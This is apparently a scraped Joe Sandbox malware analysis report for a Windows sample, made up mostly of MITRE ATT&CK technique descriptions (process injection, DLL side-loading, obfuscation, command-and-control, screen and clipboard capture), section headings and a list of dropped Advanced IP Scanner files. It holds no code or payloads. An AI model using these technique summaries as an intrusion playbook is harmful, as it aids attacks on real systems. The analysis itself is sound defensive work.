Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report KC0uZWwr8p.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Remote Access Functionality

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Advanced IP Scanner\Advanced_IP_Scanner.ico (copy)

C:\Program Files (x86)\Advanced IP Scanner\Qt5Core.dll (copy)

C:\Program Files (x86)\Advanced IP Scanner\Qt5Gui.dll (copy)

C:\Program Files (x86)\Advanced IP Scanner\Qt5Network.dll (copy)

C:\Program Files (x86)\Advanced IP Scanner\Qt5PrintSupport.dll (copy)

C:\Program Files (x86)\Advanced IP Scanner\Qt5Widgets.dll (copy)

C:\Program Files (x86)\Advanced IP Scanner\Qt5WinExtras.dll (copy)

C:\Program Files (x86)\Advanced IP Scanner\Qt5Xml.dll (copy)

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe (copy)

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_ar_sa.qm (copy)

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_bg_bg.qm (copy)

Windows Analysis Report
KC0uZWwr8p.exe

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre